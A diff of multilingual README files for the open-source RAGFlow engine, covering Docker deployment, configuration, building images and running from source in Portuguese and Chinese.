    > O comando abaixo baixa a edição `v0.20.0-slim` da imagem Docker do RAGFlow. Consulte a tabela a seguir para descrições de diferentes edições do RAGFlow. Para baixar uma edição do RAGFlow diferente da `v0.20.0-slim`, atualize a variável `RAGFLOW_IMAGE` conforme necessário no **docker/.env** antes de usar `docker compose` para iniciar o servidor. Por exemplo: defina `RAGFLOW_IMAGE=infiniflow/ragflow:v0.20.0` para a edição completa `v0.20.0`.
    ```bash
    $ cd ragflow/docker
    # Use CPU for embedding and DeepDoc tasks:
    $ docker compose -f docker-compose.yml up -d
    # To use GPU to accelerate embedding and DeepDoc tasks:
    # docker compose -f docker-compose-gpu.yml up -d
    ```
    | Tag da imagem RAGFlow | Tamanho da imagem (GB) | Possui modelos de incorporação? | Estável?                 |
    | --------------------- | ---------------------- | ------------------------------- | ------------------------ |
    | v0.20.0               | ~9                     | :heavy_check_mark:              | Lançamento estável       |
    | v0.20.0-slim          | ~2                     | ❌                              | Lançamento estável       |
    | nightly               | ~9                     | :heavy_check_mark:              | _Instável_ build noturno |
    | nightly-slim          | ~2                     | ❌                               | _Instável_ build noturno |
 4.  Verifique o status do servidor após tê-lo iniciado:
    ```bash
    $ docker logs -f ragflow-server
    ```
    _O seguinte resultado confirma o lançamento bem-sucedido do sistema:_
    ```bash
         ____   ___    ______ ______ __
        / __ \ /   |  / ____// ____// /____  _      __
       / /_/ // /| | / / __ / /_   / // __ \| | /| / /
      / _, _// ___ |/ /_/ // __/  / // /_/ /| |/ |/ /
     /_/ |_|/_/  |_|\____//_/    /_/ \____/ |__/|__/
     * Rodando em todos os endereços (0.0.0.0)
    ```
    > Se você pular essa etapa de confirmação e acessar diretamente o RAGFlow, seu navegador pode exibir um erro `network anormal`, pois, nesse momento, seu RAGFlow pode não estar totalmente inicializado.
 5.  No seu navegador, insira o endereço IP do seu servidor e faça login no RAGFlow.
    > Com as configurações padrão, você só precisa digitar `http://IP_DO_SEU_MÁQUINA` (**sem** o número da porta), pois a porta HTTP padrão `80` pode ser omitida ao usar as configurações padrão.
 6.  Em [service_conf.yaml.template](./docker/service_conf.yaml.template), selecione a fábrica LLM desejada em `user_default_llm` e atualize o campo `API_KEY` com a chave de API correspondente.
    > Consulte [llm_api_key_setup](https://ragflow.io/docs/dev/llm_api_key_setup) para mais informações.
 _O show está no ar!_
 ## 🔧 Configurações
 Quando se trata de configurações do sistema, você precisará gerenciar os seguintes arquivos:
 - [.env](./docker/.env): Contém as configurações fundamentais para o sistema, como `SVR_HTTP_PORT`, `MYSQL_PASSWORD` e `MINIO_PASSWORD`.
 - [service_conf.yaml.template](./docker/service_conf.yaml.template): Configura os serviços de back-end. As variáveis de ambiente neste arquivo serão automaticamente preenchidas quando o contêiner Docker for iniciado. Quaisquer variáveis de ambiente definidas dentro do contêiner Docker estarão disponíveis para uso, permitindo personalizar o comportamento do serviço com base no ambiente de implantação.
 - [docker-compose.yml](./docker/docker-compose.yml): O sistema depende do [docker-compose.yml](./docker/docker-compose.yml) para iniciar.
 > O arquivo [./docker/README](./docker/README.md) fornece uma descrição detalhada das configurações do ambiente e dos serviços, que podem ser usadas como `${ENV_VARS}` no arquivo [service_conf.yaml.template](./docker/service_conf.yaml.template).
 Para atualizar a porta HTTP de serviço padrão (80), vá até [docker-compose.yml](./docker/docker-compose.yml) e altere `80:80` para `<SUA_PORTA_DE_SERVIÇO>:80`.
 Atualizações nas configurações acima exigem um reinício de todos os contêineres para que tenham efeito:
 > ```bash
 > $ docker compose -f docker-compose.yml up -d
 > ```
 ### Mudar o mecanismo de documentos de Elasticsearch para Infinity
 O RAGFlow usa o Elasticsearch por padrão para armazenar texto completo e vetores. Para mudar para o [Infinity](https://github.com/infiniflow/infinity/), siga estas etapas:
 1. Pare todos os contêineres em execução:
   ```bash
   $ docker compose -f docker/docker-compose.yml down -v
   ```
   Note: `-v` irá deletar os volumes do contêiner, e os dados existentes serão apagados.
 2. Defina `DOC_ENGINE` no **docker/.env** para `infinity`.
 3. Inicie os contêineres:
   ```bash
   $ docker compose -f docker-compose.yml up -d
   ```
 > [!ATENÇÃO]
 > A mudança para o Infinity em uma máquina Linux/arm64 ainda não é oficialmente suportada.
 ## 🔧 Criar uma imagem Docker sem modelos de incorporação
 Esta imagem tem cerca de 2 GB de tamanho e depende de serviços externos de LLM e incorporação.
 ```bash
 git clone https://github.com/infiniflow/ragflow.git
 cd ragflow/
 docker build --platform linux/amd64 --build-arg LIGHTEN=1 -f Dockerfile -t infiniflow/ragflow:nightly-slim .
 ```
 ## 🔧 Criar uma imagem Docker incluindo modelos de incorporação
 Esta imagem tem cerca de 9 GB de tamanho. Como inclui modelos de incorporação, depende apenas de serviços externos de LLM.
 ```bash
 git clone https://github.com/infiniflow/ragflow.git
 cd ragflow/
 docker build --platform linux/amd64 -f Dockerfile -t infiniflow/ragflow:nightly .
 ```
 ## 🔨 Lançar o serviço a partir do código-fonte para desenvolvimento
 1. Instale o `uv`, ou pule esta etapa se ele já estiver instalado:
   ```bash
   pipx install uv pre-commit
   ```
 2. Clone o código-fonte e instale as dependências Python:
   ```bash
   git clone https://github.com/infiniflow/ragflow.git
   cd ragflow/
   uv sync --python 3.10 --all-extras # instala os módulos Python dependentes do RAGFlow
   uv run download_deps.py
   pre-commit install
   ```
 3. Inicie os serviços dependentes (MinIO, Elasticsearch, Redis e MySQL) usando Docker Compose:
   ```bash
   docker compose -f docker/docker-compose-base.yml up -d
   ```
   Adicione a seguinte linha ao arquivo `/etc/hosts` para resolver todos os hosts especificados em **docker/.env** para `127.0.0.1`:
   ```
   127.0.0.1       es01 infinity mysql minio redis sandbox-executor-manager
   ```
 4. Se não conseguir acessar o HuggingFace, defina a variável de ambiente `HF_ENDPOINT` para usar um site espelho:
   ```bash
   export HF_ENDPOINT=https://hf-mirror.com
   ```
 5. Se o seu sistema operacional não tiver jemalloc, instale-o da seguinte maneira:
    ```bash
    # ubuntu
    sudo apt-get install libjemalloc-dev
    # centos
    sudo yum instalar jemalloc
    ```
 6. Lance o serviço de back-end:
   ```bash
   source .venv/bin/activate
   export PYTHONPATH=$(pwd)
   bash docker/launch_backend_service.sh
   ```
 7. Instale as dependências do front-end:
   ```bash
   cd web
   npm install
   ```
 8. Lance o serviço de front-end:
   ```bash
   npm run dev
   ```
   _O seguinte resultado confirma o lançamento bem-sucedido do sistema:_
   ![](https://github.com/user-attachments/assets/0daf462c-a24d-4496-a66f-92533534e187)
 9. Pare os serviços de front-end e back-end do RAGFlow após a conclusão do desenvolvimento:
    ```bash
    pkill -f "ragflow_server.py|task_executor.py"
    ```
 ## 📚 Documentação
 - [Quickstart](https://ragflow.io/docs/dev/)
 - [Configuration](https://ragflow.io/docs/dev/configurations)
 - [Release notes](https://ragflow.io/docs/dev/release_notes)
 - [User guides](https://ragflow.io/docs/dev/category/guides)
 - [Developer guides](https://ragflow.io/docs/dev/category/developers)
 - [References](https://ragflow.io/docs/dev/category/references)
 - [FAQs](https://ragflow.io/docs/dev/faq)
 ## 📜 Roadmap
 Veja o [RAGFlow Roadmap 2025](https://github.com/infiniflow/ragflow/issues/4214)
 ## 🏄 Comunidade
 - [Discord](https://discord.gg/NjYzJD3GM3)
 - [Twitter](https://twitter.com/infiniflowai)
 - [GitHub Discussions](https://github.com/orgs/infiniflow/discussions)
 ## 🙌 Contribuindo
 O RAGFlow prospera por meio da colaboração de código aberto. Com esse espírito, abraçamos contribuições diversas da comunidade.
 Se você deseja fazer parte, primeiro revise nossas [Diretrizes de Contribuição](https://ragflow.io/docs/dev/contributing).
--- a/README_tzh.md
+++ b/README_tzh.md
@ -0,0 +1,413 @@
 <div align="center">
 <a href="https://demo.ragflow.io/">
 <img src="web/src/assets/logo-with-text.png" width="350" alt="ragflow logo">
 </a>
 </div>
 <p align="center">
  <a href="./README.md"><img alt="README in English" src="https://img.shields.io/badge/English-DFE0E5"></a>
  <a href="./README_zh.md"><img alt="简体中文版自述文件" src="https://img.shields.io/badge/简体中文-DFE0E5"></a>
  <a href="./README_tzh.md"><img alt="繁體版中文自述文件" src="https://img.shields.io/badge/繁體中文-DBEDFA"></a>
  <a href="./README_ja.md"><img alt="日本語のREADME" src="https://img.shields.io/badge/日本語-DFE0E5"></a>
  <a href="./README_ko.md"><img alt="한국어" src="https://img.shields.io/badge/한국어-DFE0E5"></a>
  <a href="./README_id.md"><img alt="Bahasa Indonesia" src="https://img.shields.io/badge/Bahasa Indonesia-DFE0E5"></a>
  <a href="./README_pt_br.md"><img alt="Português(Brasil)" src="https://img.shields.io/badge/Português(Brasil)-DFE0E5"></a>
 </p>
 <p align="center">
    <a href="https://x.com/intent/follow?screen_name=infiniflowai" target="_blank">
        <img src="https://img.shields.io/twitter/follow/infiniflow?logo=X&color=%20%23f5f5f5" alt="follow on X(Twitter)">
    </a>
    <a href="https://demo.ragflow.io" target="_blank">
        <img alt="Static Badge" src="https://img.shields.io/badge/Online-Demo-4e6b99">
    </a>
    <a href="https://hub.docker.com/r/infiniflow/ragflow" target="_blank">
        <img src="https://img.shields.io/docker/pulls/infiniflow/ragflow?label=Docker%20Pulls&color=0db7ed&logo=docker&logoColor=white&style=flat-square" alt="docker pull infiniflow/ragflow:v0.20.0">
    </a>
    <a href="https://github.com/infiniflow/ragflow/releases/latest">
        <img src="https://img.shields.io/github/v/release/infiniflow/ragflow?color=blue&label=Latest%20Release" alt="Latest Release">
    </a>
    <a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
        <img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?labelColor=d4eaf7&color=2e6cc4" alt="license">
    </a>
    <a href="https://deepwiki.com/infiniflow/ragflow">
        <img alt="Ask DeepWiki" src="https://deepwiki.com/badge.svg">
    </a>
 </p>
 <h4 align="center">
  <a href="https://ragflow.io/docs/dev/">Document</a> |
  <a href="https://github.com/infiniflow/ragflow/issues/4214">Roadmap</a> |
  <a href="https://twitter.com/infiniflowai">Twitter</a> |
  <a href="https://discord.gg/NjYzJD3GM3">Discord</a> |
  <a href="https://demo.ragflow.io">Demo</a>
 </h4>
 #
 <div align="center">
 <a href="https://trendshift.io/repositories/9064" target="_blank"><img src="https://trendshift.io/api/badge/repositories/9064" alt="infiniflow%2Fragflow | Trendshift" style="width: 250px; height: 55px;" width="250" height="55"/></a>
 </div>
 <details open>
 <summary><b>📕 目錄</b></summary>
 - 💡 [RAGFlow 是什麼？](#-RAGFlow-是什麼)
 - 🎮 [Demo-試用](#-demo-試用)
 - 📌 [近期更新](#-近期更新)
 - 🌟 [主要功能](#-主要功能)
 - 🔎 [系統架構](#-系統架構)
 - 🎬 [快速開始](#-快速開始)
 - 🔧 [系統配置](#-系統配置)
 - 🔨 [以原始碼啟動服務](#-以原始碼啟動服務)
 - 📚 [技術文檔](#-技術文檔)
 - 📜 [路線圖](#-路線圖)
 - 🏄 [貢獻指南](#-貢獻指南)
 - 🙌 [加入社區](#-加入社區)
 - 🤝 [商務合作](#-商務合作)
 </details>
 ## 💡 RAGFlow 是什麼？
 [RAGFlow](https://ragflow.io/) 是一款基於深度文件理解所建構的開源 RAG（Retrieval-Augmented Generation）引擎。 RAGFlow 可以為各種規模的企業及個人提供一套精簡的 RAG 工作流程，結合大語言模型（LLM）針對用戶各類不同的複雜格式數據提供可靠的問答以及有理有據的引用。
 ## 🎮 Demo 試用
 請登入網址 [https://demo.ragflow.io](https://demo.ragflow.io) 試用 demo。
 <div align="center" style="margin-top:20px;margin-bottom:20px;">
 <img src="https://raw.githubusercontent.com/infiniflow/ragflow-docs/refs/heads/image/image/chunking.gif" width="1200"/>
 <img src="https://raw.githubusercontent.com/infiniflow/ragflow-docs/refs/heads/image/image/agentic-dark.gif" width="1200"/>
 </div>
 ## 🔥 近期更新
 - 2025-08-01 支援 agentic workflow
 - 2025-05-23 為 Agent 新增 Python/JS 程式碼執行器元件。
 - 2025-05-05 支援跨語言查詢。
 - 2025-03-19 PDF和DOCX中的圖支持用多模態大模型去解析得到描述.
 - 2025-02-28 結合網路搜尋（Tavily），對於任意大模型實現類似 Deep Research 的推理功能.
 - 2024-12-18 升級了 DeepDoc 的文檔佈局分析模型。
 - 2024-08-22 支援用 RAG 技術實現從自然語言到 SQL 語句的轉換。
 ## 🎉 關注項目
 ⭐️ 點擊右上角的 Star 追蹤 RAGFlow，可以取得最新發布的即時通知 !🌟
 <div align="center" style="margin-top:20px;margin-bottom:20px;">
 <img src="https://github.com/user-attachments/assets/18c9707e-b8aa-4caf-a154-037089c105ba" width="1200"/>
 </div>
 ## 🌟 主要功能
 ### 🍭 **"Quality in, quality out"**
 - 基於[深度文件理解](./deepdoc/README.md)，能夠從各類複雜格式的非結構化資料中提取真知灼見。
 - 真正在無限上下文（token）的場景下快速完成大海撈針測試。
 ### 🍱 **基於模板的文字切片**
 - 不只是智能，更重要的是可控可解釋。
 - 多種文字範本可供選擇
 ### 🌱 **有理有據、最大程度降低幻覺（hallucination）**
 - 文字切片過程視覺化，支援手動調整。
 - 有理有據：答案提供關鍵引用的快照並支持追根溯源。
 ### 🍔 **相容各類異質資料來源**
 - 支援豐富的文件類型，包括 Word 文件、PPT、excel 表格、txt 檔案、圖片、PDF、影印件、影印件、結構化資料、網頁等。
 ### 🛀 **全程無憂、自動化的 RAG 工作流程**
 - 全面優化的 RAG 工作流程可以支援從個人應用乃至超大型企業的各類生態系統。
 - 大語言模型 LLM 以及向量模型皆支援配置。
 - 基於多路召回、融合重排序。
 - 提供易用的 API，可輕鬆整合到各類企業系統。
 ## 🔎 系統架構
 <div align="center" style="margin-top:20px;margin-bottom:20px;">
 <img src="https://github.com/infiniflow/ragflow/assets/12318111/d6ac5664-c237-4200-a7c2-a4a00691b485" width="1000"/>
 </div>
 ## 🎬 快速開始
 ### 📝 前提條件
 - CPU >= 4 核
 - RAM >= 16 GB
 - Disk >= 50 GB
 - Docker >= 24.0.0 & Docker Compose >= v2.26.1
 - [gVisor](https://gvisor.dev/docs/user_guide/install/): 僅在您打算使用 RAGFlow 的代碼執行器（沙箱）功能時才需要安裝。
 > [!TIP]
 > 如果你並沒有在本機安裝 Docker（Windows、Mac，或 Linux）, 可以參考文件 [Install Docker Engine](https://docs.docker.com/engine/install/) 自行安裝。
 ### 🚀 啟動伺服器
 1. 確保 `vm.max_map_count` 不小於 262144：
   > 如需確認 `vm.max_map_count` 的大小：
   >
   > ```bash
   > $ sysctl vm.max_map_count
   > ```
   >
   > 如果 `vm.max_map_count` 的值小於 262144，可以進行重設：
   >
   > ```bash
   > # 這裡我們設為 262144:
   > $ sudo sysctl -w vm.max_map_count=262144
   > ```
   >
   > 你的改動會在下次系統重新啟動時被重置。如果希望做永久改動，還需要在 **/etc/sysctl.conf** 檔案裡把 `vm.max_map_count` 的值再相應更新一遍：
   >
   > ```bash
   > vm.max_map_count=262144
   > ```
 2. 克隆倉庫：
   ```bash
   $ git clone https://github.com/infiniflow/ragflow.git
   ```
 3. 進入 **docker** 資料夾，利用事先編譯好的 Docker 映像啟動伺服器：
 > [!CAUTION]
 > 所有 Docker 映像檔都是為 x86 平台建置的。目前，我們不提供 ARM64 平台的 Docker 映像檔。
 > 如果您使用的是 ARM64 平台，請使用 [這份指南](https://ragflow.io/docs/dev/build_docker_image) 來建置適合您系統的 Docker 映像檔。
   > 執行以下指令會自動下載 RAGFlow slim Docker 映像 `v0.20.0-slim`。請參考下表查看不同 Docker 發行版的說明。如需下載不同於 `v0.20.0-slim` 的 Docker 映像，請在執行 `docker compose` 啟動服務之前先更新 **docker/.env** 檔案內的 `RAGFLOW_IMAGE` 變數。例如，你可以透過設定 `RAGFLOW_IMAGE=infiniflow/ragflow:v0.20.0` 來下載 RAGFlow 鏡像的 `v0.20.0` 完整發行版。
   ```bash
   $ cd ragflow/docker
   # Use CPU for embedding and DeepDoc tasks:
   $ docker compose -f docker-compose.yml up -d
   # To use GPU to accelerate embedding and DeepDoc tasks:
   # docker compose -f docker-compose-gpu.yml up -d
   ```
   | RAGFlow image tag | Image size (GB) | Has embedding models? | Stable?                  |
   | ----------------- | --------------- | --------------------- | ------------------------ |
   | v0.20.0           | &approx;9       | :heavy_check_mark:    | Stable release           |
   | v0.20.0-slim      | &approx;2       | ❌                    | Stable release           |
   | nightly           | &approx;9       | :heavy_check_mark:    | _Unstable_ nightly build |
   | nightly-slim      | &approx;2       | ❌                     | _Unstable_ nightly build |
   > [!TIP]
   > 如果你遇到 Docker 映像檔拉不下來的問題，可以在 **docker/.env** 檔案內根據變數 `RAGFLOW_IMAGE` 的註解提示選擇華為雲或阿里雲的對應映像。
   >
   > - 華為雲鏡像名：`swr.cn-north-4.myhuaweicloud.com/infiniflow/ragflow`
   > - 阿里雲鏡像名：`registry.cn-hangzhou.aliyuncs.com/infiniflow/ragflow`
 4. 伺服器啟動成功後再次確認伺服器狀態：
   ```bash
   $ docker logs -f ragflow-server
   ```
   _出現以下介面提示說明伺服器啟動成功：_
   ```bash
        ____   ___    ______ ______ __
       / __ \ /   |  / ____// ____// /____  _      __
      / /_/ // /| | / / __ / /_   / // __ \| | /| / /
     / _, _// ___ |/ /_/ // __/  / // /_/ /| |/ |/ /
    /_/ |_|/_/  |_|\____//_/    /_/ \____/ |__/|__/
    * Running on all addresses (0.0.0.0)
   ```
   > 如果您跳過這一步驟系統確認步驟就登入 RAGFlow，你的瀏覽器有可能會提示 `network anormal` 或 `網路異常`，因為 RAGFlow 可能並未完全啟動成功。
 5. 在你的瀏覽器中輸入你的伺服器對應的 IP 位址並登入 RAGFlow。
   > 上面這個範例中，您只需輸入 http://IP_OF_YOUR_MACHINE 即可：未改動過設定則無需輸入連接埠（預設的 HTTP 服務連接埠 80）。
 6. 在 [service_conf.yaml.template](./docker/service_conf.yaml.template) 檔案的 `user_default_llm` 欄位設定 LLM factory，並在 `API_KEY` 欄填入和你選擇的大模型相對應的 API key。
   > 詳見 [llm_api_key_setup](https://ragflow.io/docs/dev/llm_api_key_setup)。
   _好戲開始，接著奏樂接著舞！ _
 ## 🔧 系統配置
 系統配置涉及以下三份文件：
 - [.env](./docker/.env)：存放一些系統環境變量，例如 `SVR_HTTP_PORT`、`MYSQL_PASSWORD`、`MINIO_PASSWORD` 等。
 - [service_conf.yaml.template](./docker/service_conf.yaml.template)：設定各類別後台服務。
 - [docker-compose.yml](./docker/docker-compose.yml): 系統依賴該檔案完成啟動。
 請務必確保 [.env](./docker/.env) 檔案中的變數設定與 [service_conf.yaml.template](./docker/service_conf.yaml.template) 檔案中的設定保持一致！
 如果無法存取映像網站 hub.docker.com 或模型網站 huggingface.co，請依照 [.env](./docker/.env) 註解修改 `RAGFLOW_IMAGE` 和 `HF_ENDPOINT`。
 > [./docker/README](./docker/README.md) 解釋了 [service_conf.yaml.template](./docker/service_conf.yaml.template) 用到的環境變數設定和服務配置。
 如需更新預設的 HTTP 服務連接埠(80), 可以在[docker-compose.yml](./docker/docker-compose.yml) 檔案中將配置`80:80` 改為`<YOUR_SERVING_PORT>:80` 。
 > 所有系統配置都需要透過系統重新啟動生效：
 >
 > ```bash
 > $ docker compose -f docker-compose.yml up -d
 > ```
 ###把文檔引擎從 Elasticsearch 切換成為 Infinity
 RAGFlow 預設使用 Elasticsearch 儲存文字和向量資料. 如果要切換為 [Infinity](https://github.com/infiniflow/infinity/), 可以按照下面步驟進行:
 1. 停止所有容器運作:
   ```bash
   $ docker compose -f docker/docker-compose.yml down -v
   ```
   Note: `-v` 將會刪除 docker 容器的 volumes，已有的資料會被清空。
 2. 設定 **docker/.env** 目錄中的 `DOC_ENGINE` 為 `infinity`.
 3. 啟動容器:
   ```bash
   $ docker compose -f docker-compose.yml up -d
   ```
 > [!WARNING]
 > Infinity 目前官方並未正式支援在 Linux/arm64 架構下的機器上運行.
 ## 🔧 原始碼編譯 Docker 映像（不含 embedding 模型）
 本 Docker 映像大小約 2 GB 左右並且依賴外部的大模型和 embedding 服務。
 ```bash
 git clone https://github.com/infiniflow/ragflow.git
 cd ragflow/
 docker build --platform linux/amd64 --build-arg LIGHTEN=1 --build-arg NEED_MIRROR=1 -f Dockerfile -t infiniflow/ragflow:nightly-slim .
 ```
 ## 🔧 原始碼編譯 Docker 映像（包含 embedding 模型）
 本 Docker 大小約 9 GB 左右。由於已包含 embedding 模型，所以只需依賴外部的大模型服務即可。
 ```bash
 git clone https://github.com/infiniflow/ragflow.git
 cd ragflow/
 docker build --platform linux/amd64 --build-arg NEED_MIRROR=1 -f Dockerfile -t infiniflow/ragflow:nightly .
 ```
 ## 🔨 以原始碼啟動服務
 1. 安裝 uv。如已安裝，可跳過此步驟：
   ```bash
   pipx install uv pre-commit
   export UV_INDEX=https://mirrors.aliyun.com/pypi/simple
   ```
 2. 下載原始碼並安裝 Python 依賴：
   ```bash
   git clone https://github.com/infiniflow/ragflow.git
   cd ragflow/
   uv sync --python 3.10 --all-extras # install RAGFlow dependent python modules
   uv run download_deps.py
   pre-commit install
   ```
 3. 透過 Docker Compose 啟動依賴的服務（MinIO, Elasticsearch, Redis, and MySQL）：
   ```bash
   docker compose -f docker/docker-compose-base.yml up -d
   ```
   在 `/etc/hosts` 中加入以下程式碼，將 **conf/service_conf.yaml** 檔案中的所有 host 位址都解析為 `127.0.0.1`：
   ```
   127.0.0.1       es01 infinity mysql minio redis sandbox-executor-manager
   ```
 4. 如果無法存取 HuggingFace，可以把環境變數 `HF_ENDPOINT` 設為對應的鏡像網站：
   ```bash
   export HF_ENDPOINT=https://hf-mirror.com
   ```
 5. 如果你的操作系统没有 jemalloc，请按照如下方式安装：
   ```bash
   # ubuntu
   sudo apt-get install libjemalloc-dev
   # centos
   sudo yum install jemalloc
   ```
 6. 啟動後端服務：
   ```bash
   source .venv/bin/activate
   export PYTHONPATH=$(pwd)
   bash docker/launch_backend_service.sh
   ```
 7. 安裝前端依賴：
   ```bash
   cd web
   npm install
   ```
 8. 啟動前端服務：
   ```bash
   npm run dev
   ```
   以下界面說明系統已成功啟動：_
   ![](https://github.com/user-attachments/assets/0daf462c-a24d-4496-a66f-92533534e187)
   ```
 9. 開發完成後停止 RAGFlow 前端和後端服務：
   ```bash
   pkill -f "ragflow_server.py|task_executor.py"
   ```
 ## 📚 技術文檔
 - [Quickstart](https://ragflow.io/docs/dev/)
 - [Configuration](https://ragflow.io/docs/dev/configurations)
 - [Release notes](https://ragflow.io/docs/dev/release_notes)
 - [User guides](https://ragflow.io/docs/dev/category/guides)
 - [Developer guides](https://ragflow.io/docs/dev/category/developers)
 - [References](https://ragflow.io/docs/dev/category/references)
 - [FAQs](https://ragflow.io/docs/dev/faq)
 ## 📜 路線圖
 詳見 [RAGFlow Roadmap 2025](https://github.com/infiniflow/ragflow/issues/4214) 。
 ## 🏄 開源社群
 - [Discord](https://discord.gg/zd4qPW6t)
 - [Twitter](https://twitter.com/infiniflowai)
 - [GitHub Discussions](https://github.com/orgs/infiniflow/discussions)
 ## 🙌 貢獻指南
 RAGFlow 只有透過開源協作才能蓬勃發展。秉持這項精神,我們歡迎來自社區的各種貢獻。如果您有意參與其中,請查閱我們的 [貢獻者指南](https://ragflow.io/docs/dev/contributing) 。
 ## 🤝 商務合作
 - [預約諮詢](https://aao615odquw.feishu.cn/share/base/form/shrcnjw7QleretCLqh1nuPo1xxh)
 ## 👥 加入社區
 掃二維碼加入 RAGFlow 小助手，進 RAGFlow 交流群。
 <p align="center">
  <img src="https://github.com/infiniflow/ragflow/assets/7248/bccf284f-46f2-4445-9809-8f1030fb7585" width=50% height=50%>
 </p>
--- a/README_zh.md
+++ b/README_zh.md
@ -5,28 +5,99 @@
 </div>
 <p align="center">
-  <a href="./README.md">English</a> |
+  <a href="./README.md"><img alt="README in English" src="https://img.shields.io/badge/English-DFE0E5"></a>
-  <a href="./README_zh.md">简体中文</a> |
+  <a href="./README_zh.md"><img alt="简体中文版自述文件" src="https://img.shields.io/badge/简体中文-DBEDFA"></a>
-  <a href="./README_ja.md">日本語</a>
+  <a href="./README_tzh.md"><img alt="繁體版中文自述文件" src="https://img.shields.io/badge/繁體中文-DFE0E5"></a>
  <a href="./README_ja.md"><img alt="日本語のREADME" src="https://img.shields.io/badge/日本語-DFE0E5"></a>
  <a href="./README_ko.md"><img alt="한국어" src="https://img.shields.io/badge/한국어-DFE0E5"></a>
  <a href="./README_id.md"><img alt="Bahasa Indonesia" src="https://img.shields.io/badge/Bahasa Indonesia-DFE0E5"></a>
  <a href="./README_pt_br.md"><img alt="Português(Brasil)" src="https://img.shields.io/badge/Português(Brasil)-DFE0E5"></a>
 </p>
 <p align="center">
    <a href="https://x.com/intent/follow?screen_name=infiniflowai" target="_blank">
        <img src="https://img.shields.io/twitter/follow/infiniflow?logo=X&color=%20%23f5f5f5" alt="follow on X(Twitter)">
    </a>
    <a href="https://demo.ragflow.io" target="_blank">
        <img alt="Static Badge" src="https://img.shields.io/badge/Online-Demo-4e6b99">
    </a>
    <a href="https://hub.docker.com/r/infiniflow/ragflow" target="_blank">
        <img src="https://img.shields.io/docker/pulls/infiniflow/ragflow?label=Docker%20Pulls&color=0db7ed&logo=docker&logoColor=white&style=flat-square" alt="docker pull infiniflow/ragflow:v0.20.0">
    </a>
    <a href="https://github.com/infiniflow/ragflow/releases/latest">
        <img src="https://img.shields.io/github/v/release/infiniflow/ragflow?color=blue&label=Latest%20Release" alt="Latest Release">
    </a>
-    <a href="https://demo.ragflow.io" target="_blank">
+    <a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
-        <img alt="Static Badge" src="https://img.shields.io/badge/RAGFLOW-LLM-white?&labelColor=dd0af7"></a>
+        <img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?labelColor=d4eaf7&color=2e6cc4" alt="license">
-    <a href="https://hub.docker.com/r/infiniflow/ragflow" target="_blank">
+    </a>
-        <img src="https://img.shields.io/badge/docker_pull-ragflow:v0.3.2-brightgreen"
+    <a href="https://deepwiki.com/infiniflow/ragflow">
-            alt="docker pull infiniflow/ragflow:v0.3.2"></a>
+        <img alt="Ask DeepWiki" src="https://deepwiki.com/badge.svg">
-      <a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
+    </a>
    <img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?style=flat-square&labelColor=d4eaf7&color=7d09f1" alt="license">
  </a>
 </p>
 <h4 align="center">
  <a href="https://ragflow.io/docs/dev/">Document</a> |
  <a href="https://github.com/infiniflow/ragflow/issues/4214">Roadmap</a> |
  <a href="https://twitter.com/infiniflowai">Twitter</a> |
  <a href="https://discord.gg/NjYzJD3GM3">Discord</a> |
  <a href="https://demo.ragflow.io">Demo</a>
 </h4>
 #
 <div align="center">
 <a href="https://trendshift.io/repositories/9064" target="_blank"><img src="https://trendshift.io/api/badge/repositories/9064" alt="infiniflow%2Fragflow | Trendshift" style="width: 250px; height: 55px;" width="250" height="55"/></a>
 </div>
 <details open>
 <summary><b>📕 目录</b></summary>
 - 💡 [RAGFlow 是什么？](#-RAGFlow-是什么)
 - 🎮 [Demo](#-demo)
 - 📌 [近期更新](#-近期更新)
 - 🌟 [主要功能](#-主要功能)
 - 🔎 [系统架构](#-系统架构)
 - 🎬 [快速开始](#-快速开始)
 - 🔧 [系统配置](#-系统配置)
 - 🔨 [以源代码启动服务](#-以源代码启动服务)
 - 📚 [技术文档](#-技术文档)
 - 📜 [路线图](#-路线图)
 - 🏄 [贡献指南](#-贡献指南)
 - 🙌 [加入社区](#-加入社区)
 - 🤝 [商务合作](#-商务合作)
 </details>
 ## 💡 RAGFlow 是什么？
-[RAGFlow](https://demo.ragflow.io) 是一款基于深度文档理解构建的开源 RAG（Retrieval-Augmented Generation）引擎。RAGFlow 可以为各种规模的企业及个人提供一套精简的 RAG 工作流程，结合大语言模型（LLM）针对用户各类不同的复杂格式数据提供可靠的问答以及有理有据的引用。
+[RAGFlow](https://ragflow.io/) 是一款基于深度文档理解构建的开源 RAG（Retrieval-Augmented Generation）引擎。RAGFlow 可以为各种规模的企业及个人提供一套精简的 RAG 工作流程，结合大语言模型（LLM）针对用户各类不同的复杂格式数据提供可靠的问答以及有理有据的引用。
 ## 🎮 Demo 试用
 请登录网址 [https://demo.ragflow.io](https://demo.ragflow.io) 试用 demo。
 <div align="center" style="margin-top:20px;margin-bottom:20px;">
 <img src="https://raw.githubusercontent.com/infiniflow/ragflow-docs/refs/heads/image/image/chunking.gif" width="1200"/>
 <img src="https://raw.githubusercontent.com/infiniflow/ragflow-docs/refs/heads/image/image/agentic-dark.gif" width="1200"/>
 </div>
 ## 🔥 近期更新
 - 2025-08-01 支持 agentic workflow。
 - 2025-05-23 Agent 新增 Python/JS 代码执行器组件。
 - 2025-05-05 支持跨语言查询。
 - 2025-03-19 PDF 和 DOCX 中的图支持用多模态大模型去解析得到描述.
 - 2025-02-28 结合互联网搜索（Tavily），对于任意大模型实现类似 Deep Research 的推理功能.
 - 2024-12-18 升级了 DeepDoc 的文档布局分析模型。
 - 2024-08-22 支持用 RAG 技术实现从自然语言到 SQL 语句的转换。
 ## 🎉 关注项目
 ⭐️ 点击右上角的 Star 关注 RAGFlow，可以获取最新发布的实时通知 !🌟
 <div align="center" style="margin-top:20px;margin-bottom:20px;">
 <img src="https://github.com/user-attachments/assets/18c9707e-b8aa-4caf-a154-037089c105ba" width="1200"/>
 </div>
 ## 🌟 主要功能
@ -47,7 +118,7 @@
 ### 🍔 **兼容各类异构数据源**
- 支持丰富的文件类型，包括 Word 文档、PPT、excel 表格、txt 文件、图片、PDF、影印件、复印件、结构化数据, 网页等。
+- 支持丰富的文件类型，包括 Word 文档、PPT、excel 表格、txt 文件、图片、PDF、影印件、复印件、结构化数据、网页等。
 ### 🛀 **全程无忧、自动化的 RAG 工作流**
@ -56,16 +127,6 @@
 - 基于多路召回、融合重排序。
